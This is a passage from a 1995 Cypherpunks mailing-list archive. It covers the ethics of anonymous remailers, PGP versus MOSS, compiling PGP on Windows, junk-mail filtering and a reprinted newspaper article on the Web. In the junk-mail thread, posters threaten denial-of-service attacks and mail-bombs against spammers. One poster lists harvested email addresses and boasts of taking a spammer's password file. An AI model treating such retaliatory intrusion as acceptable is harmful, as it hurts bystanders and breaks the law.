child or teenager intending to torment the target, not by an actual 
pedophile. It's possible that the sender was the target himself. It's also
possible that the sender was an actual pedophile or a child-hostile adult, 
but that's not the only plausible explanation. People do strange, strange
stuff.)

In a situation where person A uses system X to send messages to person B who
uses system Y, I'm not sure what B can expect from the system operator of
system X. (I'm thinking about net custom here, not law.) If A wants to send
messages to B, but B doesn't want to receive them, should A be forced to
stop sending? Does X have an obligation to make A stop? Does X have an
obligation to modify his system such that messages from A to B are 
automagically suppressed? Does X have an obligation to refuse service to A
(and forego payment for service from A) if A won't stop sending to B? 
Is the answer different if B doesn't want the messages because they 
(are likely to) contain profanity? or because they are from a person of the
wrong religion? or because they're hostile or argumentative? 

As a first response I'm likely to say that if A knows (or should know, or
can guess and be pretty certain of the result) that B doesn't want to get a
particular message, A shouldn't send it. But then I realize that there are a
number of exceptions - what about if A's message to B is in response to a 
spam or otherwise inappropriate message from B? what about where B owes A
money? or if B has said something ridiculous or stupid and A is writing to
correct B? I think that there wouldn't be many inappropriate posts sent to
the C-punks list, for example, if everyone who thought a post was
inappropriate (not just factually arguable, or uninteresting) sent a message
to that effect; the impact of just a few hundred such messages in reply to
a single message would likely be burdensome enough to make the sender think
twice before sending again. But that inconvenience is anticipated by (and
motivates) the senders of those hundreds of messages. I still don't think
it's wrong to send the messages.

I guess my point is that eliminating "abuse" is pretty much impossible 
because abuse is in the eye of the beholder. I don't think we need to 
rely on the mercy or good graces of the net at large, though - remailers
will likely prove to be as difficult to eliminate as spammers have been.
The net is too big to be centrally policed, and individual providers often
have an incentive to tolerate behavior otherwise frowned upon because
they're being paid to do so. (and if they begin content filtering they
may lose any sort of quasi-common-carrier status they might enjoy now,
viz _Cubby v. Compuserve_, etc.) Even if the United States adopts rules
requiring messages be identified as to the sender, it won't be possible to
eliminate overseas remailers - and I imagine that folks would just start up
pseudonymous remailers. (I've worked on some prototype code and will
deploy a pseudonymous remailer - where people get names like 
"fjones@pseudo.goldenbear.com <Frank Jones>" instead of
"an12345@pseudo.goldenbear.com <Anonymous Sender>", in order to divert or
confuse anti-anonymous policies or programs.)

I think adopting a submissive or apologetic stance with respect to the 
operation of a remailer is a mistake. What we do is protected by the First
amendment, supports a 200+ year tradition of anonymous political speech in
America, provides a valuable service to a worldwide community, and can help
avoid the very abuse they are accused of facilitating. The child who was the
target of the "Mr. Pedophile" message(s) should have been taught how to use
remailers and how to maintain his privacy on the net so that, if he really
is the victim of some sort of random child stalker, it won't happen again.
There's no reason why any child should post to the net under their real name,
or why their messages should be traceable to their physical bodies. If we're
concerned about protecting kids from bad people who might reach them via the
net, we need to teach kids how to send untraceable and unreplyable messages;
how to send messages and do business on the net without allowing hostile
or unscrupulous people to track them down; and how to make good choices 
about revealing personal information only to people who have a good reason
to know it.

People who are the targets of abusive messages or are concerned about
abusive messages are some of the people who need remailers and need 
pro-privacy network tools the most. Giving in to a knee-jerk anti-privacy
reaction only reinforces the erroneous notion that security is created
by an enforced lack of privacy.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMK/ZRn3YhjZY3fMNAQHQkQQAmLlRGcwEbJyhb9dYm3dx/BoRj0NBTUr3
MOmRkP2+AtdCKL8gcaWhnY9TeXHj7enezo5TF8ooqvcOLEha29mL9Q+G08t2pkoM
SGHr79Yr38syc6Mf+1pXAN7T1Dn600xgnJsDmrFFoQI5H0ZSeA6oLT3ShzhWpsJ/
3FuNvR7TyLg=
=nsOZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Tue, 21 Nov 1995 01:18:23 +0800
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <199511192347.PAA07661@tess-turbo.mit.edu>
Message-ID: <Pine.SUN.3.91.951119172235.23425B-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 19 Nov 1995, Derek Atkins wrote:

> What do you mean by "technically superior"?  What technical merits
> does MOSS have over PGP?  It does have a better protocol with which to
> integrate it into mailers, but it is only a transmission protocol, not
> a security mechanism change.  Worse, MOSS uses X.509, which requires a
> lot of overhead for certificates.

Ah, I was hoping that my statement would stir some controversy. I've 
learned that well thought out, carefully reasoned posts never get any 
response.

I agree with you that the X.509 stuff is extra baggage in MOSS. 
Fortunately, the use of X.509 is optional.

MOSS has two very large advantages over PGP:

1. It can operate without temp files.

2. It has no non-MIME variant.

It will take forever for PGP/MIME to catch on. Thus, PGP will never 
really be a suitable candidate for my generic interface. Ah well.

> On the other hand, the MIME-PGP protocol can provide the same
> integration functionality as MOSS and still allow the use of the
> simple PGP certification structure that already exists.

This is true. I hope it happens.

> -derek
> 

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 21 Nov 1995 01:18:21 +0800
To: cypherpunks@toad.com
Subject: Micropayments article?
Message-ID: <Pine.3.89.9511191738.A5801-0100000@netcom5>
MIME-Version: 1.0
Content-Type: text/plain


Would somone please send me a pointer to the micropayment article?


TIA,








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 21 Nov 1995 00:38:14 +0800
To: Lucky Green <cypherpunks@toad.com
Subject: Re: Micropayments article?
Message-ID: <acd526a100021004703d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:46 AM 11/20/95, Lucky Green wrote:
>Would somone please send me a pointer to the micropayment article?

http://theory.lcs.mit.edu/~rivest/

I am copying the list because, perhaps counterintuitively, it will save
bandwidth and overall effort. The reasons are left as an exercise in game
theory for the student.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 20 Nov 1995 08:11:17 +0800
To: cypherpunks@toad.com
Subject: "Junk E-Mail"
Message-ID: <199511192347.SAA06834@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Is anyone else getting lots of junk e-mail lately? I'm getting all
kinds of direct marketing crap to both of my main accounts and I haven't
posted to usenet in months. I pretty much only post to cypherpunks, and
that is rarely. And I never put my real email address on web sites that
ask for them. I fear I am on some kind of direct marketing e-mail
"list". I've warned the perpetrators that if I get another ad from
them, they better expect a denial-of-service attack from me on their
site and lots of mail-bombs.


sick of the clutter,
-Ray





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Turner <turner@TeleCheck.com>
Date: Mon, 20 Nov 1995 11:10:01 +0800
To: cypherpunks@toad.com
Subject: Re: Recompiling PGP262i under microsoft.
Message-ID: <9511200255.AA03117@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text



For those that might benefit, I have included some notes I have gained 
through my wanderings through PGPland, towards an easy PGP-mail program 
for Windows.  Below I have included sketchy details in compiling PGP 
under as an MS-DOS app, WIN16 DLL, and Win32 DLL. 
 
I won't be able to provide specific details, until I recover data from 
my backup tapes (I had a nasty drive failure, and have been lethargic in 
recovering).  I finally get my IBM PC/RT configured for TCP/IP and my PC 
explodes. :<. 
 
If anything here is wrong, or fuzzy, feel free to post corrections, 
etc., as this is all from my alcohol soaked, nicotine riddled brain. 
 
Compiling PGP under MSVC 1.5 & 2.x 
========= === ===== ==== === = === 
 
To compile PGP under MSVC 1.5 (I believe there is a supplied Microsoft C 
make file that was written for Quick C) you will need to create a 
project and add the files necessary.  Be sure to include the already 
compiled RSAREF.LIB in the project files. 
 
Unfortunately, there is one very annoying problem with Microsoft Visual 
C, in which it will regenerate the dependencies from the source code 
files without preprocessing the #ifdefs.  You will have to edit the make 
file and take out all of the UNIX sys/whatever stuff. 
 
I believe this is the biggest hurdle, but you might try using the Quick 
C make file, although I don't think it will work without modification 
(Microsoft seems disenchanted with compatibility, even between revisions 
of their own software). 
 
You may also have some trouble with type conversion, but I think its 
intuitive to overcome that. (its been a while...).  If anyone knows of
an easier way to do this, I will be more than happy to listen. 
 
Compiling RSAREF as a DLL under MSVC 
========= ====== == = === ===== ==== 
 
This is easy, but you may have trouble with the dependencies again.  The 
most important thing is to create a .DEF file and put all of the export 
declarations in there.  Unless you plan on rewrite PGP to load the DLL 
dynamically, simply link against it so save a few headaches (remember 
you still need a .DEF file or you will get unresolved errors!). 
 
Compiling PGP as a Windows DLL 
========= === == = ======= === 
 
I was able to find someone in Australia (sorry, the name eludes me at 
the moment) who managed to port PGP to a Windows DLL, under Borland C.  
I only installed Borland C++ 4.0 today, so much of my work/play has been 
targeted towards Microsoft Visual C++ 1.5/2.0 under NT (besides I was 
waiting on PGP3.0). 
 
If anyone wants these files (for Borland) I will send them out when I 
recover them (hopefully).  It includes modifications to no more than 
three files, and includes both reentrant and non-reentrant entry points.  
I also have the mail program (MAPI) that this guy wrote in executable 
form.  He was very careful about the Austrailian equivalent of the ITAR, 
so he would only send the modified files, which I will pass on for those 
who are interested. 
 
If you want to do the same thing under MSVC, the same changes apply. 

Hope that help some. 

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzCXvuAAAAEEALiDFkQgR9leZVf5X0HLPdUFmtfyp3X0nFMi7RjqIsv1pAh9
ZZFVwkBlo01APJcw4ncPrpjGKvu8P7t0a6nB+tIZliGGvmCt/SSVyc44RdTz1KV2
TlsA/NW1WF4yBARK1aCuHgrtwfOhV8hBqh88TlJ/DSMxDXCM1+w0jdWG+cPtAAUR
tC9Kb2UgTi4gVHVybmVyIChpbnNlY3VyZSkgPHR1cm5lckB0ZWxlY2hlY2suY29t
Pg==
=sGFY
-----END PGP PUBLIC KEY BLOCK-----
-- 
Joe N. Turner		Telecheck International
turner@telecheck.com    5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Bridges <corey@netscape.com>
Date: Mon, 20 Nov 1995 20:57:44 +0800
To: Greg Broiles <remailer-operators@c2.org
Subject: Re: remailer abuse
Message-ID: <199511200524.VAA00445@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:27 PM 11/19/95 -0800, Greg Broiles wrote:
>...
> If A wants to send
>messages to B, but B doesn't want to receive them, should A be forced to
>stop sending?

My rambling $.02:

I haven't thought all this through, but I have an emerging stance. Just this
week I've started ploughing through the Cyphernomicon, and was smacked in
the face with the eminently pragmatic Mr. May's statement that any law that
cannot be enforced should not exist. 

Up until, say, this week, I'd always been in favor of Caller ID. I'd figured
if anyone wants to call me, I have the right to know who it is. By default,
I had adopted this position concerning email. Now, one day I will receive an
anonymous email. Will I be offended? Maybe. Can I do anything about it? Not
likely. Anonymous communication is only going to get easier. Current
congressional prattling notwithstanding, the onus of responsibility will
have to shift to the recipient. For example, I could configure my mail
program to automatically throw away any incoming message with "anonymous" in
the "From" header. (Or any message from *@pseudo.goldenbear.com, for that
matter) 

If junk mail continues to bother people, it's only a matter of time until
mail programs' filtering capabilities become much more sophisticated. (Of
course, for all I know, there already ARE programs that do what I'm about to
propose.) People can maintain a "do not accept from" list, containing every
anonymous remailer they've ever heard about, or an "accept only from" list,
containing just the people they wish to converse with. I think it's this
second option that will become increasingly important. Sure it's your right
to send me whatever the hell you like, just as it's my right to ignore you
completely. Bringing this back to my hobby-horse of Caller ID, you end up
with even greater protection than an unlisted number--let the whole world
know my number--no one'll get through unless I already know him. And then in
the brave unregulated future, if you make a new friend, you merely swipe his
public-key business card through your PDA, which adds it to your "accept
calls and emails from" list.

And to take a stab at another pair of Greg's questions, if A is sending
messages from his account on X's system to B, and B doesn't want to receive
them, should B have the right to make X stop A? No. (Not that I think the
law is going to realize that any time soon.) Should X have the right to stop
A? Hell yes--it's his system. Let A find a more open-minded ISP if he
doesn't like it.

Corey Bridges
Security Scribe
Netscape Communications Corporation
415-528-2978





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 20 Nov 1995 20:54:17 +0800
To: Ray Cromwell <rjc@clark.net>
Subject: Re: "Junk E-Mail"
In-Reply-To: <199511192347.SAA06834@clark.net>
Message-ID: <Pine.ULT.3.91.951119213257.14590D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 19 Nov 1995, Ray Cromwell wrote:

>   Is anyone else getting lots of junk e-mail lately? I'm getting all
> kinds of direct marketing crap to both of my main accounts and I haven't
> posted to usenet in months. I pretty much only post to cypherpunks, and
> that is rarely. And I never put my real email address on web sites that
> ask for them. I fear I am on some kind of direct marketing e-mail
> "list". I've warned the perpetrators that if I get another ad from
> them, they better expect a denial-of-service attack from me on their
> site and lots of mail-bombs.

I have been told that this is off-topic, but yes. And same conclusion here
that someone is passing around an old list. So far, most of the junk email
I've received is addressed to jabba@deathstar, an account I haven't used
for three years. Most of the other folks around here get junk mail
addressed to username@jessica or @mordor, when in fact we all moved to
@networking a year ago. 

I happen to have a little over 50K addresses used by the valleynet.net
spammer. I don't see your address on the list, but there are 86 other
clark.net addresses, and these: 

rjc@bayvax.decus.org
rjc@mhc.edu
rjc@netpoint.net
rjc@plaza.ds.adp.com
rjc@wells.haystack.edu
rjcd85a@prodigy.com
rjconn@freenet.calgary.ab.ca
rjcook@ns.cencom.net
rjcron@most.magec.com
rjcsys@cpcug.org

I propose a surgical strike mailbomb response -- forge unsubscribes and
complaints to postmaster from every one of these 50K addresses I have. I 
know they've been spammed before; they'd probably agree. To what 
addresses should I send these unsubscribes?

The list of spammed addresses is yours if you can verify who you are and
tell me what you're going to do with it. 

A malicious attack might be justifiable in extreme cases. For example, 
because of some really, really stupid Web and mail server design flaws, 
it would have trivial for me to have erased the entire hard drives of all 
of the machines at valleynet.net. But I figured picking up his password 
file and telling all of his customers what I thought of him would be 
almost as effective while retainng the moral high ground.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 20 Nov 1995 21:00:33 +0800
To: Corey Bridges <remailer-operators@c2.org
Subject: Paid Delivery (was Re: remailer abuse)
Message-ID: <acd55af301021004bafc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:21 AM 11/20/95, Corey Bridges wrote:
>At 05:27 PM 11/19/95 -0800, Greg Broiles wrote:
>>...
>> If A wants to send
>>messages to B, but B doesn't want to receive them, should A be forced to
>>stop sending?
>
>My rambling $.02:
>
>I haven't thought all this through, but I have an emerging stance. Just this
>week I've started ploughing through the Cyphernomicon, and was smacked in
>the face with the eminently pragmatic Mr. May's statement that any law that
>cannot be enforced should not exist.

Thanks. It's always heartening to see that someone is affected positively
by one's arguments.

>Up until, say, this week, I'd always been in favor of Caller ID. I'd figured
>if anyone wants to call me, I have the right to know who it is. By default,
>I had adopted this position concerning email. Now, one day I will receive an
>anonymous email. Will I be offended? Maybe. Can I do anything about it? Not
>likely. Anonymous communication is only going to get easier. Current

Yes, anonymous communication is getting easier, and the costs of trying to
stop it are becoming impossibly high. It would essentially require a police
state to stop, and even then it probably couldn't be stopped...for example,
I could always set up a "Tim's Quoting Service," which passes on anonymous
mail to a recipient with the "Hey, someone says this..." Could I be
prosecuted? Not even in a police state. Just one of dozens of approaches to
skirt such laws.

However, anticipating your next point, this does not mean anonymous
communication bandwidth will become infinite. Solutions are predictable.
See below.

>congressional prattling notwithstanding, the onus of responsibility will
>have to shift to the recipient. For example, I could configure my mail
>program to automatically throw away any incoming message with "anonymous" in
>the "From" header. (Or any message from *@pseudo.goldenbear.com, for that
>matter)
>
>If junk mail continues to bother people, it's only a matter of time until
>mail programs' filtering capabilities become much more sophisticated. (Of
>course, for all I know, there already ARE programs that do what I'm about to
>propose.) People can maintain a "do not accept from" list, containing every
>anonymous remailer they've ever heard about, or an "accept only from" list,

Many of us do this all the time. The Macintosh (and Windows) mail program I
currently use is "Eudora Pro," from Qualcomm. Extensive filtering options.
Certainly it is possible to set up filters to put mail from "anonymous"
into mailboxes, or the trash. And just as possible, though a bit more
involved, to put mail from _desired_ sources into boxes, or have a priority
flag raised, etc.

What if one is "bombarded" by mail, thousands of messages a day, or many
megabytes?

There are two main options, besides meaningless clamoring for legislation
against "junk mail":

1. Some services, like Prodigy, allow one to discard a message before
reading it, with no charge. (Seeing the sender and message name only.) This
does not solve the problem completely, but it certainly eliminates cost to
the enduser. The service provider still has the mail, but at least his
network connections are likely to not be much affected....still possible to
bring the service to its knees, which brings up the second approach....:

2. Sender pays the costs of transmission. That is, if someone wishes to
send 10 megabytes to a site, at least _he_ (or _she_) pays the freight.
This is of course the way things now work with the U.S. postal system, with
"Postage Due" no longer common: if the sender doesn't

In the real world, nothing is really free, so the whole economics of the
Internet has been deceiving for quite some time. The notion that one can
"spam" for free, shipping megabytes to thousands of sites, has led to
strange notions about the economics of the Net and, as a result, for calls
for new laws about "unwanted e-mail," "spamming," etc.

Of course, most users on the Net are now paying for connectivity one way or
another. Even U.C. Berkeley, one of the pioneers in Unix and campus
connections to the Net, has subcontracted out it's Net connections to
Netcom, with students and faculty paying around $15 a month. A sign of the
times. (There are also reasons why at least so far it has proven viable to
_not_ charge for individual transmissions. Various kinds of subsidies.)

Filtering is a solution for the reader not to have see stuff he doesn't
want to see, but he or his ISP may still receive the stuff, even if it gets
discarded, which is why the long term solution is likely to involve paid
deliveries.

(Needless to say, this is not currently part of the Net, and I'm not
suggesting it will happen anytime soon, or because I happen to think it's a
solution. Rather, what I'm saying is that it's a _technological_ and
_market_ solution to the "problem" of spammage and "unwanted mail filling
up our mailboxes." How it happens is unclear. But think of how markets
generally evolve to deal with what would naively be seen as unsolvable
crises or shortages. Long before we all are getting gigabytes of unwanted
stuff every day, alternatives will develop. I am confident that paid
delivery is one of the keys.)


>And to take a stab at another pair of Greg's questions, if A is sending
>messages from his account on X's system to B, and B doesn't want to receive
>them, should B have the right to make X stop A? No. (Not that I think the
>law is going to realize that any time soon.) Should X have the right to stop
>A? Hell yes--it's his system. Let A find a more open-minded ISP if he
>doesn't like it.

Amen. Exactly.


>Corey Bridges
>Security Scribe
>Netscape Communications Corporation
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Interesting. And now I'm even happier to have partly made a convert.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Tue, 21 Nov 1995 00:06:33 +0800
To: remailer-operators@c2.org
Subject: Re: remailer abuse
In-Reply-To: <199511200127.AA17430@ideath.goldenbear.com>
Message-ID: <Pine.A32.3.91.951119225404.61842A-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 19 Nov 1995, Greg Broiles wrote:

> I think adopting a submissive or apologetic stance with respect to the 
> operation of a remailer is a mistake. What we do is protected by the First
> amendment, supports a 200+ year tradition of anonymous political speech in
> America, provides a valuable service to a worldwide community, and can help
> avoid the very abuse they are accused of facilitating. The child who was the

[extremely lucid comments clipped to save bandwidth]

Agreed, wholeheartedly. The above paragraph would be a perfect candidate 
for wide disemination across the net. 

The facts are that to eliminate the "abusive" mail would require 
crippling the remailer system to an unacceptable degree. Therefore we as 
operators are in a position of being forced to either tolerate messages 
that we may disagree (strongly) with, shut down the remailers, or resort 
to inadequate 40bit encryption and psuedo-anonymous Penti.fi remailing.
(no offense to Julf intended..)

I see nothing submissive or apologetic about pointing this fact out in a 
focused and organised way. In fact, making this fact plain might actually 
limit the number of people using the remailers to harrass other users. If 
general oppinion is that remailer operators accept and condone /all/ 
forms of communication, without regard for it potential effects, why 
shouldnt the spammer take advantage of our generosity?

Certainly being PC should not be the primary consideration in any 
undertaking, but the united states (and other nations) have well paid and 
well organised spin doctors working to convince the public that 
cryptographers and remail operators are "bad" people who's only purpose 
is to aid pedophiles and other criminals in carrying out their dastardly 
deeds. Ignoring the political implications of operating a remailer is 
simply foolish. Public oppinion is going to be an important consideration 
when the laws come to the table. Sure, we could move the remailers off 
shore, but why do that unless we have to? The idea of being a 
"cryptorebel", or an underground warrior for peace and privacy is 
certainly romantic, but i'd like to think that it doesnt have to be that way.

Then again, i didnt need propaganda to convince me that I needed privacy. 
Maybe im just strange..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 20 Nov 1995 15:59:11 +0800
To: cypherpunks@toad.com
Subject: Re: remailer abuse
Message-ID: <199511200747.XAA09583@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 22:43 11/19/95 -0800, Timothy C. May wrote:
>Yes, anonymous communication is getting easier, and the costs of trying to
>stop it are becoming impossibly high. It would essentially require a police
>state to stop, and even then it probably couldn't be stopped...

Considering that there are well known ways of spoofing IP addresses, if you
really want to, you can be anyone.  (They must be well know.  I know at
least one. <grin>)


>2. Sender pays the costs of transmission. That is, if someone wishes to
>send 10 megabytes to a site, at least _he_ (or _she_) pays the freight.
>This is of course the way things now work with the U.S. postal system, with
>"Postage Due" no longer common...

I think we lack direct charges for network traffic because detailed
accounting for use of each net-link is too expensive.  The situation is
similar to that of the telephone system in the 1950s, where the switches
which connected local calls did not have enough smarts to do charging, and
so started the tradition of "free" local calls.

When lots of people start sending full motion video over the net we may see
ISPs develop use based charging schemes.  I should add that one of the
reasons I use Netcom is that they do NOT charge for connect time or network
traffic.  There is a market for known, fixed costs too.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 21 Nov 1995 04:07:29 +0800
To: cypherpunks@toad.com
Subject: [NON-LIST] Re: reputations: discussions and meta-discussions
Message-ID: <199511200819.AAA22823@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


(This really should be in private mail; keyid D072FC19 (still unnamed) 
can reach me using anon.penet.fi or alpha.c2.org or a reply-block
remailer to get replies....   Or if you prefer, send me one-way remail
and I'll post replies in alt.anonymous.messages.)

At 02:17 AM 11/19/95 -0800, - keyid D072FC19 (still unnamed) wrote:

>On Sat, 18 Nov 1995, Bill Stewart wrote: 
>> Here's the new entity's key, signed :-)  I haven't added it to the
>> PGP key servers; I'll leave that up to you...
>
>As we know, a public key certificate is a binding between the key and
>some attribute, as asserted by the signer.  In this case you have asserted
>a binding between my key and the string "a new entity, as yet unnamed".
>I don't understand why you did this.  Would you please explain?
>The only reason I can think of is that you wanted to provide evidence
>for the key's creation date by timestamping it.  If that was the case,
>I thank you.  But in the future, to avoid confusion, perhaps you can 
>create a new ID "timestamp" for the key and sign that instead.

Are you asking why I used the string "a new entity, as yet unnamed",
or why I certified it?  If the former, it's because when I loaded the
PGP key block into my public key file, that's who it said it was,
and it matched the name in your cypherpunks posting.

If you're asking why I certified a key used by a nym, I started doing that
a couple months ago, as an experiment about what it means to certify keys
and how to provide better continuity for keys used by nyms, and signing
yours seemed like an appropriate thing to do (since you chose to name
your key as belonging to the same string you signed your message with.)
I have the policy of only signing one key for a given namestring with the key
I use for signing nyms, so it gives a certain evidence of uniqueness as well as 
the timestamping effect.

Since you also commented on cluttering up namespace, I didn't send the key
to the keyserver myself; that's up to you.

Has it been a wildly successful experiment?  Well, no :-)  But I've at least
had to think about some of the issues more, and a couple of people have gotten
their nym keys signed.





#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 20 Nov 1995 21:41:42 +0800
To: cypherpunks@toad.com
Subject: Re: WRITTEN CODE
Message-ID: <199511201316.FAA09442@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:

> Curious, where is uncg.edu? Your French name doesn't make me think you're 
> in the States (as an .edu address might suggest, but then not necessarily 
> either). (univ of Calgary?)

I think the University of Calgary is actually in the .ca domain. 

It's a Canadian address.  Its just like your very own domain.  Your
machine tesla is on uottawa.ca.  Your University of Ottawa address is not
in .edu, but is in .ca. 

It's interesting though, that you brought up Calgary.

Calgary, as I assume our Ottawa poster knows, was very busy over the last
week.  Grand Central station.  All of the politico's seemed to transit the
city. 

Reform Party Leader, Preston Manning, and Conservative Party Leader, Jean
Charest, held duelling fund-raising dinners this last Wednesday in
Calgary.  And Canada's ambassador to the United States, the Prime
Minister's nephew -- Raymond Chretien -- left Washington and spoke to the
Calgary Chamber of Commerce about NAFTA on Friday. 

Chretien was particularly troubled by remarks from Senate Majority Leader
Bob Dole, about wanting to re-open Chapter 19 in the NAFTA.  Following his
Chamber of Commerce address, Chretien was quoted as saying, "For us,
Chapter 19 is the heart of NAFTA.  And this dispute mechanism has been put
in there to take into account the fact that we are a much smaller economy,
a much smaller country.  We have to rely on those tri-national panels to
defend our interests." 

Chretien for now is chalking up the threatening comments to political 
posturing in the run-up to the presidential election next year, otherwise 
he said, "we will have a serious problem."

Chretien also played down security concerns after a knife-wielding
intruder broke into his uncle's (the Prime Minister's) home at 24 Sussex. 
Despite living in Washington, D.C., Chretien said he doesn't fear for his
public safety.  

When he was asked about the lack of visible protection during his visit to
Calgary, he said: "I'm just a humble public servant." 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 20 Nov 1995 12:56:15 +0800
To: cypherpunks@toad.com
Subject: Ponzi Web
Message-ID: <199511200430.FAA02552@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



NY Times, 11-20-95, front page.

If Medium Is the Message, the Message Is the Web

By John Markoff

San Francisco, Nov. 19 -- The Associated Press was formed in
the mid-19th century when a group of newspapers decided to
invest jointly in a newfangled medium -- the telegraph -- to
speed the collection and dissemination of information.

Last week, A.P. announced that it would adopt a newer-fangled
medium -- the World Wide Web -- to begin distributing its
articles and photographs over the global Internet. It was
simply the latest, but perhaps most historically significant,
move yet by an old-line media organization into the World Wide
Web, the Internet multimedia information-retrieval system that
appears on the verge of becoming a mass medium itself.

If the medium is the message, then the message these days is
the World Wide Web.

In short order the Web, which three years ago was little more
than a research tool for physicists and computer hobbyists,
has flourished. It is being embraced by media concerns,
consumer-product companies and businesses of various stripes
that are creating thousands of so-called Web sites each month,
with the number of computers playing host to one or more of
these sites already exceeding 100,000.

Conservative estimates place the number of people who have
used the Web in the millions, and it is not hard to find more
breathless estimates in the tens of millions.

Capable of letting people use computers to send and receive
text, sound, still images and video clips, the Web
incorporates elements of the various print and electronic
media that have preceded it. And yet, the Web is poised not to
replace its predecessors but to take a place alongside them as
a social, cultural and economic force in its own right.

Its complementary role is already evident: many radio stations
and all the major television networks have Web sites promoting
their programs and stars. Newspapers, including The New York
Times, are devising cyberspace editions.

And few movies anymore are released without a promotional Web
site, including "Goldeneye" the James Bond film that opened
this weekend at theaters everywhere and on the Web at the
address http://www.mgmua.com/bond. The site offers the movie's
theme song performed by Tina Turner, more than a dozen video
clips from the film and illustrated biographies of the cast
members.

Prime-time television commercials by Toyota and other
advertisers now routinely include a Web address. And Procter
& Gamble, whose advertising has long helped underwrite the
mass media, has even staked out prime Web real estate by
reserving addresses that include flu.com and toiletpaper.com.

"We are poised on the edge of a new medium," Clay Felker,
director of the magazine program at the University of
California at Berkeley's graduate journalism school, said.
"It's going to change the nature of how we acquire
information."

As with each mass medium that has arrived before it, the Web
has reached this threshold through a confluence of a key
technology, a ready audience and a stream of corporate backers
willing to bet that profitable businesses can be built on it.
But few experts are willing to declare that the Web has taken
its place in the mass media pantheon because the profitable
business formulas have yet to be found.

Newspapers and magazines make money by selling individual
copies, subscriptions and advertising space. Radio and
television stations sell air time to those with money and a
message. Movie theaters sell tickets. But on the Web so far,
despite seed-money by adventurous advertisers and some
tentative efforts to charge for access to sites or services,
there is no certainty that this medium will achieve the
critical mass that capitalism demands of its mass media.

"How do you make a business out of the World Wide Web?" asked
Norman Pearlstine, editor in chief of Time Inc., which has an
experimental Web site called Pathfinder that offers selected
contents from the company's magazines
(http://www.pathfinder.com). But because ad revenue alone is
not carrying the freight, Time Inc. will begin testing ways to
charge visitors to its site.

And yet, the technological prerequisites are firmly in place.
The Web is an outgrowth of the Internet, which began as an
academic research experiment in the late 1960's. For more than
two decades the Internet remained largely inaccessible, used
mainly by computer scientists and Pentagon researchers,
university scholars and students.

Then came the World Wide Web.

Like the Internet, the Web began as a tool to let scientists
easily and quickly share information. Conceived in the late
1980's by Tim Berners-Lee, who was then a software designer at
CERN, the Swiss physics research center, the basic Web
technology was first put to use in 1990.

The big breakthrough came in 1992, when student researchers at
the National Center for Supercomputing Applications in
Illinois created Mosaic, a simple software tool called a Web
